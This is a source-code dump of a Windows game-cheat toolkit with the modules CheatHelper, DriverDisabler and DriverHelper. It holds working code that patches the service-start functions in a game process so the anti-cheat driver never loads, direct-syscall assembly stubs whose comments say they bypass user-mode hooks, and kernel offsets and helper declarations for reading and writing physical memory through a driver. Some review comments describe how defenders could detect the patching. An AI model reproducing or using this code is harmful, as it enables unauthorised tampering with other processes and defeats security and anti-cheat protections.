    static intptr_t RPMAddressHigh;
    static intptr_t RPMAddressLow;
    static intptr_t RPMAddress;
    static intptr_t WPMAddressHigh;
    static intptr_t WPMAddressLow;
    static intptr_t WPMAddress;
    static intptr_t ntRVMAddress;
    static intptr_t ntRVMAddressHigh;
    static intptr_t ntRVMAddressLow;
    static intptr_t ntWVMAddress;
    static intptr_t ntWVMAddressHigh;
    static intptr_t ntWVMAddressLow;
    static intptr_t ZwRVMAddressHigh;
    static intptr_t ZwRVMAddressLow;
    static intptr_t ZwRVMAddress;
    static intptr_t ZwWVMAddressHigh;
    static intptr_t ZwWVMAddressLow;
    static intptr_t ZwWVMAddress;

    static DWORDLONG startAddressPhyHigh; //Phy address
    static DWORDLONG startAddressPhyLow; //Phy address
    static DWORDLONG startAddressPhy; //Phy address

    //Handles
    static HANDLE requestHandleNP;
    static HANDLE requestHandleFM;
    static HANDLE requestHandleDrv;



    //Buffers
    // One BUFSIZE-byte buffer and one size value per memory function above.
    static char RPMBuffer[BUFSIZE];
    static char WPMBuffer[BUFSIZE];
    static char ntRVMBuffer[BUFSIZE];
    static char ntWVMBuffer[BUFSIZE];
    static char ZwRVMBuffer[BUFSIZE];
    static char ZwWVMBuffer[BUFSIZE];
    static SIZE_T RPMBufferSize;
    static SIZE_T WPMBufferSize;
    static SIZE_T ntRVMBufferSize;
    static SIZE_T ntWVMBufferSize;
    static SIZE_T ZwRVMBufferSize;
    static SIZE_T ZwWVMBufferSize;

    //Shared Memory
    //static LPCSTR sPipeName;

    //Strings
    // Fixed BUFSIZE-byte name buffers.
    // NOTE(review): presumably filled by loadConfig(); whatever writes them has
    // to truncate to BUFSIZE - 1 characters and keep the terminator.
    static char targetProc[BUFSIZE];
    static char privotProc[BUFSIZE];
    static char namedPipeName[BUFSIZE];
    static char fileMapName[BUFSIZE];
    static char driverName[BUFSIZE];


};



// Named-pipe wrapper holding two pipe handles.
// NOTE(review): no constructor or destructor is declared and the handle
// members have no initialisers, so they are indeterminate until a method
// assigns them, and nothing declared here closes them.
class NamedPipeHelper
{
public:
    // NamedPipe functions
    int StartPipe(LPTSTR name);
    int ConnectPipe(LPTSTR name);
    // NOTE(review): returns an untyped pointer; who owns the memory it points
    // to is not visible here.
    PVOID ListenPipe();
    int WritePipe(const char * buffer);


private:
    HANDLE hPipeServer;
    HANDLE hNamedPipe;
};

--------------------------------------------------------------------------------
/CheatHelper/CheatHelper.vcxproj:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {A080C117-D1DB-4671-8217-65496573BA4D} 24 | Win32Proj 25 | CheatHelper 26 | 10.0.17763.0 27 | 28 | 29 | 30 | StaticLibrary 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | StaticLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | StaticLibrary 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | StaticLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | NotUsing 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_LIB;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Windows 97 | true 98 | 99 | 100 | 101 | 102 | NotUsing 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_LIB;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) 107 | true 108 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 109 | 110 | 111 | Windows 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions) 124 | true 125 | 126 | 127 | Windows 128 | true 129 | true 130 | true 131 | 132 | 133 | 134 | 135 | NotUsing 136 | Level3 137 | MaxSpeed 
138 | true 139 | true 140 | true 141 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_LIB;%(PreprocessorDefinitions) 142 | true 143 | 144 | 145 | Windows 146 | true 147 | true 148 | true 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | -------------------------------------------------------------------------------- /CheatHelper/CheatHelper.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | Source Files 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /CheatHelper/Readme.md: -------------------------------------------------------------------------------- 1 | # CheatHelper 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module provides all key features required by a cheat in order to interact with the Windows API, Memory, NamedPipes and FileMapping. 9 | 10 | ## Key Features 11 | 12 | Class NamedPipeHelper will provide assistance for NamedPipe interaction. 
 13 | 14 | Class CheatHelper will provide the following method: 15 | 16 | - WINAPI Functions 17 | - static void Suspend(DWORD processId); 18 | - static void Resume(DWORD processId); 19 | - Process Functions 20 | - static DWORD GetProcId(char* procName); 21 | - Debuging Functions 22 | - static void ConsoleSetup(const char * title); 23 | - static void PrintBytes(PVOID buffer, SIZE_T nSize); 24 | - Memory functions 25 | - static int RPM(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 26 | - static int WPM(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 27 | - static int NtRVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 28 | - static int NtWVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 29 | - static int ZwRVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 30 | - static int ZwWVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 31 | - FileMapping 32 | - static bool checkSpinLockByte(LPVOID pFileMapMem, BYTE value); 33 | - static bool setSpinLockByte(LPVOID pFileMapMem, BYTE value); 34 | - static void prepareRequest(PipeMessageRequest &PMRequest); 35 | - Configuration file (INI) 36 | - static bool loadConfig(); 37 | 38 |
--------------------------------------------------------------------------------
/CheatHelper/ZwReadWriteVM.asm:
--------------------------------------------------------------------------------
; ZwReadWriteVM.asm - two x64 MASM procedures that enter the kernel directly:
; each copies RCX to R10, loads a hard-coded system service number into EAX,
; executes `syscall` and returns. Arguments are passed through untouched, so
; the caller supplies them exactly as it would to the corresponding native
; function.
;
; NOTE(review): the procedure names suggest the services are the native
; write/read virtual-memory calls. System service numbers are not a documented
; stable interface; confirm 3Ah / 3Fh against the Windows build under test.
;
; Review note for the monitoring side: the kernel transition is issued from
; this module rather than through the ntdll.dll export, so user-mode
; instrumentation placed on that export does not observe the call. Coverage has
; to come from kernel-side telemetry, or from checking which module the
; `syscall` instruction was executed from.
.code

; Write variant: service number 3Ah.
ZwWriteVM proc
    mov r10, rcx        ; `syscall` overwrites RCX with the return address, so the first argument moves to R10
    mov eax, 3Ah        ; system service number
    syscall
    ret                 ; EAX holds whatever status the kernel returned
ZwWriteVM endp

; Read variant: identical shape, service number 3Fh.
ZwReadVM proc
    mov r10, rcx        ; first argument moves to R10, as above
    mov eax, 3Fh        ; system service number
    syscall
    ret                 ; EAX holds whatever status the kernel returned
ZwReadVM endp

end
--------------------------------------------------------------------------------
/CheatHelper/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /CheatHelper/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | 12 | 13 | 14 | // reference additional headers your program requires here 15 | -------------------------------------------------------------------------------- /CheatHelper/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /DriverDisabler/DriverDisabler.cpp: -------------------------------------------------------------------------------- 1 | // DriverDisabler.cpp : This file contains the 'main' function. Program execution begins and ends there. 
//

#include "pch.h"
#include "CheatHelper.h"
// NOTE(review): the names of the two headers below are missing from this listing.
#include
#include


// DriverBypass: overwrites the first three bytes of StartServiceA and
// OpenServiceW inside the process identified by pID.
//
//   pID      process id handed to OpenProcess.
//   returns  true only when both WriteProcessMemory calls succeed; otherwise
//            prints "ErrorN" for the first failing step and returns false.
//
// The export addresses are resolved in this process and then used as write
// targets in the remote one, so the code assumes advapi32.dll is mapped at the
// same base in both. NOTE(review): nothing here verifies that assumption.
//
// Defensive view: the observable artefacts are a PROCESS_ALL_ACCESS handle
// held by an outside process and altered bytes at the entry of two advapi32
// exports. Comparing those entry bytes with the on-disk image, and verifying
// that the service really started instead of trusting the call, exposes it.
//
// NOTE(review): hProcess is not closed on any return path.
bool DriverBypass(int pID)
{
    // Full access is requested although only the two memory writes below use the handle.
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pID);
    if (!hProcess) {
        std::cout << "Error1" << std::endl;
        return false;
    }


    // Handle of advapi32.dll as loaded in the calling process, not in the target.
    HMODULE hMod = GetModuleHandle("advapi32.dll");
    if (!hMod) {
        std::cout << "Error2" << std::endl;
        return false;
    }


    std::cout << std::hex << hMod << std::endl;
    LPVOID dwSSA = (LPVOID)GetProcAddress(hMod, "StartServiceA");
    LPVOID dwOSW = (LPVOID)GetProcAddress(hMod, "OpenServiceW");
    if (!dwSSA || !dwOSW) {
        std::cout << "Error3" << std::endl;
        return false;
    }
    std::cout << std::hex << dwSSA << std::endl;
    std::cout << std::hex << dwOSW << std::endl;
    // C2 0C 00 is the x86 encoding of `ret 0Ch`: return and release 12 bytes
    // of stack arguments.
    // NOTE(review): that is the 32-bit stdcall form for a three-argument
    // callee; the README's "x86/x64" wording is not backed by this constant.
    byte wByte[] = { 0xC2, 0x0C, 0x00 };
    if (!WriteProcessMemory(hProcess, dwSSA, &wByte, sizeof(wByte), NULL)) {
        std::cout << "Error4" << std::endl;
        return false;
    }
    // If this second write fails, the first export stays modified.
    if (!WriteProcessMemory(hProcess, dwOSW, &wByte, sizeof(wByte), NULL)) {
        std::cout << "Error5" << std::endl;
        return false;
    }

    return true;
}


// Entry point: polls once per second until CheatHelper::GetProcId returns a
// non-zero id for CheatHelper::targetProc, waits one more second, then calls
// DriverBypass on that id. The result of DriverBypass is discarded.
// NOTE(review): CheatHelper::loadConfig() is not called here (DriverTester's
// main does call it), although the README says targetProc comes from
// config.ini. Confirm where targetProc gets its value.
int main()
{
    std::cout << "[+] Init" << std::endl;

    DWORD processID = NULL;
    while (true)
    {
        processID = CheatHelper::GetProcId(CheatHelper::targetProc);
        if (processID != NULL)
        {
            // The process id is printed in hexadecimal.
            std::cout << std::hex << processID << std::endl;
            break;
        }
        Sleep(1000);
    }
    Sleep(1000);
    DriverBypass(processID);
}

// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu

// Tips for Getting Started:
//   1. Use the Solution Explorer window to add/manage files
//   2. Use the Team Explorer window to connect to source control
//   3. Use the Output window to see build output and other messages
//   4.
Use the Error List window to view errors 76 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 77 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 78 | -------------------------------------------------------------------------------- /DriverDisabler/DriverDisabler.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {723D6B45-EEBA-4C09-8528-4373BAFF330A} 24 | Win32Proj 25 | DriverDisabler 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 95 | 96 | 97 | Console 98 | true 99 | $(SolutionDir)Debug\CheatHelper.lib;%(AdditionalLibraryDirectories) 100 | 101 | 102 | 103 | 104 | Use 105 | Level3 106 | Disabled 107 | true 108 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 109 | true 110 | pch.h 111 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 112 | 113 | 114 | Console 115 | true 116 | %(AdditionalDependencies) 117 | $(VCInstallDir)lib;C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64;%(AdditionalLibraryDirectories) 118 | 119 | 120 | 121 | 122 | Use 123 | Level3 124 | MaxSpeed 
125 | true 126 | true 127 | true 128 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 129 | true 130 | pch.h 131 | 132 | 133 | Console 134 | true 135 | true 136 | true 137 | 138 | 139 | 140 | 141 | NotUsing 142 | Level3 143 | MaxSpeed 144 | true 145 | true 146 | true 147 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | pch.h 150 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 151 | 152 | 153 | Console 154 | true 155 | true 156 | true 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | Create 166 | Create 167 | Create 168 | Create 169 | 170 | 171 | 172 | 173 | {a080c117-d1db-4671-8217-65496573ba4d} 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | -------------------------------------------------------------------------------- /DriverDisabler/DriverDisabler.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /DriverDisabler/README.md: -------------------------------------------------------------------------------- 1 | # DriverDisabler 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This Module will inject a "return" on the methods StartServiceA and OpenServiceW in order to prevent to the anti-cheat to load the driver. 9 | 10 | Some Anti-Cheat (AC) load their service/driver from within the game. By injecting a return the method will get executed but no service will be started. 
11 | 12 | This module can be easily adapted to disable AC services that are started by using different methods. 13 | 14 | ## Configuration 15 | 16 | This module does not require much configuration: compile it for the required architecture (x86/x64) and inject it. 17 | 18 | **targetProc** needs to be provided using the config.ini file. 19 | 20 | ## Combination with other techniques 21 | 22 | - Run this before the Anti-cheat is loaded completely. 23 | -------------------------------------------------------------------------------- /DriverDisabler/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DriverDisabler/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DriverHelper/DriverHelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #pragma comment( lib, "ntdll.lib" ) 10 | 11 | // IMPORTANT!!! You need to set up this constant to the windows version 12 | // you are going to compile it for. 13 | #define WINVERSION 1607 14 | 15 | // Kernel offsets (used for Read Write kernel memory) 16 | #define OFFSET_DIRECTORYTABLEBASE 0x028 17 | #define OFFSET_VIRTUALSIZE 0x338 18 | #define OFFSET_SECTIONBASEADDRESS 0x3c0 19 | #define OFFSET_OBJECTTABLE 0x418 20 | #define OFFSET_IMAGEFILENAME 0x450 21 | #define OFFSET_PRIORITYCLASS 0x45f 22 | 23 | // Kernel offsets (used for enumerate modules and sections of a process using kernel memory) w10 1607 24 | #define OFFSET_EPROCESS_PEB 0x3f8 25 | #define OFFSET_PEB_LDR 0x018 26 | #define OFFSET_LDR_InMemoryOrderModuleList 0x20 27 | 28 | #if (WINVERSION == 1607) 29 | #define OFFSET_ACTIVEPROCESSLINKS 0x2f0 30 | #define OFFSET_UNIQUEPROCESSID 0x2e8 31 | #define OFFSET_VADROOT 0x620 32 | #endif 33 | 34 | 35 | #if (WINVERSION == 1703 || WINVERSION == 1709) 36 | #define OFFSET_ACTIVEPROCESSLINKS 0x2e8 37 | #define OFFSET_UNIQUEPROCESSID 0x2e0 38 | #define OFFSET_VADROOT 0x628 39 | #endif 40 | 41 | 42 | 43 | /* 44 | (*((ntkrnlmp!_MMVAD_SHORT *)0xffffb803e0fa73a0)) [Type: _MMVAD_SHORT] 45 | [+0x000] VadNode [Type: _RTL_BALANCED_NODE] 46 | [+0x000] NextVad : 0xffffb803dfc39240 [Type: _MMVAD_SHORT *] 47 | [+0x018] StartingVpn : 0x96ee040 [Type: unsigned long] 48 | [+0x01c] EndingVpn : 0x96ee13f [Type: unsigned long] 49 | [+0x020] StartingVpnHigh : 0x0 [Type: 
unsigned char] 50 | [+0x021] EndingVpnHigh : 0x0 [Type: unsigned char] 51 | 52 | */ 53 | #define OFFSET_STARTINGVPN 0x018 54 | #define OFFSET_ENDINGVPN 0x01c 55 | #define OFFSET_STARTINGVPNHIGH 0x020 56 | #define OFFSET_ENDINGVPNHIGH 0x021 57 | #define OFFSET_MMVAD_SHORT_U 0x030 58 | 59 | 60 | const ULONG ProtectionFlags[] = { 61 | PAGE_NOACCESS, 62 | PAGE_READONLY, 63 | PAGE_EXECUTE, 64 | PAGE_EXECUTE_READ, 65 | PAGE_READWRITE, 66 | PAGE_WRITECOPY, 67 | PAGE_EXECUTE_READWRITE, 68 | PAGE_EXECUTE_WRITECOPY, 69 | PAGE_NOACCESS, 70 | PAGE_NOCACHE | PAGE_READONLY, 71 | PAGE_NOCACHE | PAGE_EXECUTE, 72 | PAGE_NOCACHE | PAGE_EXECUTE_READ, 73 | PAGE_NOCACHE | PAGE_READWRITE, 74 | PAGE_NOCACHE | PAGE_WRITECOPY, 75 | PAGE_NOCACHE | PAGE_EXECUTE_READWRITE, 76 | PAGE_NOCACHE | PAGE_EXECUTE_WRITECOPY, 77 | PAGE_NOACCESS, 78 | PAGE_GUARD | PAGE_READONLY, 79 | PAGE_GUARD | PAGE_EXECUTE, 80 | PAGE_GUARD | PAGE_EXECUTE_READ, 81 | PAGE_GUARD | PAGE_READWRITE, 82 | PAGE_GUARD | PAGE_WRITECOPY, 83 | PAGE_GUARD | PAGE_EXECUTE_READWRITE, 84 | PAGE_GUARD | PAGE_EXECUTE_WRITECOPY, 85 | PAGE_NOACCESS, 86 | PAGE_WRITECOMBINE | PAGE_READONLY, 87 | PAGE_WRITECOMBINE | PAGE_EXECUTE, 88 | PAGE_WRITECOMBINE | PAGE_EXECUTE_READ, 89 | PAGE_WRITECOMBINE | PAGE_READWRITE, 90 | PAGE_WRITECOMBINE | PAGE_WRITECOPY, 91 | PAGE_WRITECOMBINE | PAGE_EXECUTE_READWRITE, 92 | PAGE_WRITECOMBINE | PAGE_EXECUTE_WRITECOPY, 93 | }; 94 | 95 | 96 | typedef BOOL (*_fn_memcpy)(ULONG64 dest, ULONG64 src, DWORD size); 97 | typedef ULONG64(*_fn_mapPhysical)(DWORDLONG physicaladdress, DWORD size); 98 | typedef ULONG64(*_fn_unmapPhysical)(ULONG64 address); 99 | 100 | // Remove padding inside structs 101 | #pragma pack(push, 1) 102 | typedef struct { 103 | CHAR ImageFileName[15]; 104 | DWORD PriorityClass; 105 | } _EPROCESS_PATTERN; 106 | 107 | 108 | // Structure of MAP 109 | typedef struct _READ_REQUEST { 110 | DWORD InterfaceType; 111 | DWORD Bus; 112 | ULONG64 PhysicalAddress; 113 | DWORD IOSpace; 114 | DWORD size; 115 | 
} READ_REQUEST; 116 | 117 | typedef struct _WRITE_REQUEST { 118 | DWORDLONG address; 119 | DWORD length; 120 | DWORDLONG buffer; 121 | } WRITE_REQUEST; 122 | 123 | typedef struct _MEMCPY_REQUEST { 124 | ULONG64 dest; 125 | ULONG64 src; 126 | DWORD size; 127 | } MEMCPY_REQUEST; 128 | 129 | 130 | 131 | // Kernel Structures 132 | typedef struct _HANDLE_TABLE_ENTRY 133 | { 134 | ULONGLONG Value; 135 | ULONGLONG GrantedAccess : 25; 136 | } HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY; 137 | 138 | typedef struct _HANDLE_TABLE 139 | { 140 | CHAR fill[100]; 141 | } HANDLE_TABLE, *PHANDLE_TABLE; 142 | 143 | 144 | struct SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX // Size => 28 145 | { 146 | PVOID Object; // Size => 4 Offset =>0 147 | ULONG UniqueProcessId; // Size => 4 Offset =>4 148 | ULONG HandleValue; // Size => 4 Offset =>8 149 | ULONG GrantedAccess; // Size => 4 Offset =>12 150 | USHORT CreatorBackTraceIndex; // Size => 2 Offset =>16 151 | USHORT ObjectTypeIndex; // Size => 2 Offset =>18 152 | ULONG HandleAttributes; // Size => 4 Offset =>20 153 | ULONG Reserved; // Size => 4 Offset =>24 154 | }; 155 | 156 | struct SYSTEM_HANDLE_INFORMATION_EX // Size => 36 157 | { 158 | ULONG NumberOfHandles; // Size => 4 Offset => 0 159 | ULONG Reserved; // Size => 4 Offset => 4 160 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; // Size => 36 Offset => 8 161 | }; 162 | 163 | 164 | typedef struct _LDR_MODULE 165 | { 166 | LIST_ENTRY InLoadOrderModuleList; 167 | LIST_ENTRY InMemoryOrderModuleList; 168 | LIST_ENTRY InInitializationOrderModuleList; 169 | PVOID BaseAddress; 170 | PVOID EntryPoint; 171 | ULONG SizeOfImage; 172 | UNICODE_STRING FullDllName; 173 | UNICODE_STRING BaseDllName; 174 | ULONG Flags; 175 | SHORT LoadCount; 176 | SHORT TlsIndex; 177 | LIST_ENTRY HashTableEntry; 178 | ULONG TimeDateStamp; 179 | } LDR_MODULE, *PLDR_MODULE; 180 | 181 | 182 | // Custom structs from ReClass (this is the information we store from each section/module) 183 | const int PATH_MAXIMUM_LENGTH = 260; 184 | 
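// Aliases taken over from the ReClass plugin interface.
using RC_Pointer = void*;
using RC_Size = size_t;
using RC_UnicodeChar = char16_t;

// NOTE(review): the template arguments in this part of the header were missing
// from the listing and are restored below. The operator bodies and the
// sections/modules element types follow directly from the declarations here.
// std::vector<uintptr_t> for pKernelPointers is presumed from the pointer-typed
// return values. TODO confirm against DriverHelper.cpp.
//
// NOTE(review): `#pragma pack(push, 1)` earlier in this header has no matching
// pop before this point, so every struct below (and anything declared after
// the header is included) is laid out with 1-byte packing.

// Protection of an enumerated section. Every non-zero value is a distinct
// bit, so values can be combined with the operators below.
enum class SectionProtection
{
    NoAccess = 0,

    Read = 1,
    Write = 2,
    CopyOnWrite = 4,
    Execute = 8,

    Guard = 16
};

// Bitwise OR of two SectionProtection values, computed on the underlying
// integer type.
inline SectionProtection operator|(SectionProtection lhs, SectionProtection rhs)
{
    using T = std::underlying_type_t<SectionProtection>;

    return static_cast<SectionProtection>(static_cast<T>(lhs) | static_cast<T>(rhs));
}

// In-place form of operator|; returns a reference to lhs.
inline SectionProtection& operator|=(SectionProtection& lhs, SectionProtection rhs)
{
    using T = std::underlying_type_t<SectionProtection>;

    lhs = static_cast<SectionProtection>(static_cast<T>(lhs) | static_cast<T>(rhs));

    return lhs;
}


// One record per enumerated section of the target process.
struct EnumerateRemoteSectionData
{
    RC_Pointer BaseAddress;
    RC_Size Size;
    //SectionType Type;
    //SectionCategory Category;
    SectionProtection Protection;
    RC_UnicodeChar Name[16];
    RC_UnicodeChar ModulePath[PATH_MAXIMUM_LENGTH];
};

// One record per enumerated module of the target process.
struct EnumerateRemoteModuleData
{
    RC_Pointer BaseAddress;
    RC_Size Size;
    RC_UnicodeChar Path[PATH_MAXIMUM_LENGTH];
};


// Static-only helper class. Only declarations are visible here; the
// definitions are not on this page, so the notes below describe signatures,
// not behaviour.
class DriverHelper
{
public:
    static int memmem(PBYTE haystack, DWORD haystack_size, PBYTE needle, DWORD needle_size);
    static int getDeviceHandle(LPTSTR name);
    static unsigned __int64 __fastcall ExpLookupHandleTableEntryW7(__int64 HandleTable, unsigned __int64 handle);
    static unsigned __int64 __fastcall ExpLookupHandleTableEntryW10(__int64 HandleTable, __int64 handle);
    static ULONG64 findPhisical_ObjectTable(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize);
    static DWORDLONG findPhisical(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize);
    static bool LeakKernelPointers(std::vector<uintptr_t> &pKernelPointers);
    static uintptr_t FindDirectoryBase();
    static uint64_t VAtoPhylAddress(uint64_t directoryTableBase, LPVOID virtualAddress);
    // NOTE(review): lpBuffer is LPCVOID on the read path and LPVOID on the
    // write path, the reverse of ReadProcessMemory/WriteProcessMemory. Confirm
    // this is intended; the signatures are left as declared.
    static bool ReadVirtualMemory(uint64_t directoryTableBase, uintptr_t virtualAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    static bool WriteVirtualMemory(uint64_t directoryTableBase, uintptr_t virtualAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
    // The vector is taken by value here, so each call copies it.
    static uintptr_t ObtainKProcessPointer(uint64_t directoryTableBase, std::vector<uintptr_t> pKernelPointers);
    static uintptr_t GetKProcess(uintptr_t &directoryTableBase);
    static uintptr_t SearchKProcess(LPCVOID processName, uintptr_t &directoryTableBase, uintptr_t pKProcess);
    static bool ReadPhyMemory(uintptr_t physicalAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    static bool WritePhyMemory(uintptr_t physicalAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
    static bool CheckProcessHeader(uintptr_t &directoryTableBase, uintptr_t pKProcessAddress);
    static bool ObtainKProcessInfo(uintptr_t &directoryTableBase, uintptr_t pKProcessAddress);
    // Developed for DriverReader (ReClass Plugin)
    static void WalkVadAVLTree(uintptr_t directoryTableBase, uintptr_t start);
    static void EnumRing3ProcessModules(uintptr_t directoryTableBase);


    // Variables
    // All state is static, i.e. one set shared by every user of the class.
    static HANDLE hDeviceDrv;
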